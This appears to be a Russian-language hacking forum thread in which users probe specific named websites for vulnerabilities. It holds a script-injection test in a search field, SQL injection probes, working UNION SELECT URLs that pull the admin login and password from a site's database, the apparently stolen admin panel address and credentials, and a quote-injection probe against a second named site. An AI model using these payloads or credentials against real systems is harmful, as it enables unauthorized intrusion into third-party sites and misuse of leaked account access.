Есть один сайтег.С виду кул, но мною там было обнаружено баги.В том и дело что только обнаружено. :(
Вот ход моих действий.:
!)Иду по сцылге: http://mysms.ipsys.net/
2)Вижу там "Пошук" и сразу сую джаваскрипт:
"><script>alert()</script>
Мне выдает:

Warning : preg_match() [function.preg-match]: Unknown modifier 'c' in /home/cmysms/public_html/shr.php on line 89

Понимаю с етим ничево не зделаю....
3) Смотрю дальше..
И вижу строчку:

http://mysms.ipsys.net/index.php?smstype=7

ОоО.Руки тянутся вбить
/index.php?smstype=phpinj
Как результат -

Помилка запиту: SELECT * FROM `sms` WHERE parentid=СЏ AND dozvil=1
Warning : mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/cmysms/public_html/sms.php on line 95

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/cmysms/public_html/sms.php on line 101

Ничево нешарю в mysqlinj, потомо и незнаю что с етим делать...
4) Покопавшись исчо увидил
/admin/
Сразу вбил
') OR ('1'='1 Ничяво..
Прошу хелпа у знающих...
Пасиб за внимание

http://mysms.ipsys.net/index.php?smstype=0xaaaa+union+select+1,2,version( ),4,5/*

А как бы ето заюзать?

http://mysms.ipsys.net/index.php?smstype=-7+union+select+1,concat(login,0x3a,pass)+from+admi n+limit+0,1
админка:
http://mysms.ipsys.net/admin/index.php
login:Baltazor
pass:stones

http://www.fuck.ru/products.aspx?id='
Значит ли че нить!!!!Иля я просто напрасно это делаю???
Server Error in '/' Application.
--------------------------------------------------------------------------------

Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.

Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".


<!-- Web.Config Configuration File -->

<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration>


Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.

К сожалению…напрасно) :)

Используйте специально прикрепленную тему для вопросов.